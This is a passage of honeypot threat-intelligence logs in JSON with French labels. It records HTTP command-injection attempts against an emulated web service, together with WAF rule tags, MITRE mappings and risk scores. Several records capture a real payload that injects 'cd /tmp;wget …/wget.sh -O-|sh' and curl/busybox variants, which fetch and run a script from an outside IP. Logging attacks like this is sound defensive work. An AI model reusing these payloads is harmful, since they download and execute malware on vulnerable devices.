\u0022risk_score\u0022: 82, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221b72e0cad9dc4a2599a7718a58f3889624ca7773\u0022, \u0022event_fingerprint\u0022: \u00226720ae9e1df4aec3742b4391426e0851c76932cf\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022089e8fdeba3be46096d33f42468daab0\u0022, \u0022path_pattern_hash\u0022: \u0022ae299b1b73fdd9de9a67e4429bae2022\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnect\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/command.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlcmd;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s d\u0022, \u0022payload_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnect\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/command.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlcmd;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s d\u0022, \u0022payload_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnect\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022165827c68ea8fd999882170e8b5e0b13dd9d8055\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/command.php\u0022, \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnect\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/command.php\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/command.php\u0022, \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/command.php\u0022, \u0022evidence_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnect\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":306},{"id":11809701,"ip":"45.153.34.252","ts":"2026-07-14 02:29:51.000000","proto":"tcp","src_port":35686,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":13,"waf_tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022]","http_method":"GET","http_target":"\/edgserver\/capture_packages?param=`cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022d14b3144d73f134ea5e298d00aee729658189c84\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 253, \u0022payload_entropy\u0022: 5.179429121905999, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 60.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 15.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 4.8, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 15.0}, \u0022risk_score\u0022: 54, \u0022tag_count\u0022: 4, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022e3bc3154d7268828ac1b65fa0908b5b346a337a1\u0022, \u0022event_fingerprint\u0022: \u0022febd7d8eb2a9255d39d8de307f8db2a263cf91c8\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 514, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932190\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022CRS 932206\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 54}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00225bcb3407c16a1391621bbba71e2dfd89\u0022, \u0022path_pattern_hash\u0022: \u0022f53c505b8189dcd6ba06b06234c7e209\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 54}, \u0022payload_preview\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;busybox wget http:\/\/91.92.40.118\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/edgserver\/capture_packages\u0022, \u0022query_string\u0022: \u0022param=`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;curl http:\/\/91.92.40.118\/wget.sh|sh -s advan` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;busybox wget http:\/\/91.92.40.118\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/edgserver\/capture_packages\u0022, \u0022query_string\u0022: \u0022param=`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;curl http:\/\/91.92.40.118\/wget.sh|sh -s advan` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;busybox wget http:\/\/91.92.40.118\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00225e950deed62e297b52951581fd9b6575f33f9850\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/edgserver\/capture_packages\u0022, \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;busybox wget http:\/\/91.92.40.118\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/edgserver\/capture_packages\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 54}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 54, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/edgserver\/capture_packages\u0022, \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/edgserver\/capture_packages\u0022, \u0022evidence_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s advan;busybox wget http:\/\/91.92.40.118\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 60 \u00b7 2 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":7,"bytes_in":253},{"id":11809699,"ip":"45.153.34.252","ts":"2026-07-14 02:29:50.000000","proto":"tcp","src_port":35662,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/adm.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00227981228fb9061b584c46dcd5df6396237d7cf2ae\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 332, \u0022payload_entropy\u0022: 5.222223037364921, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, 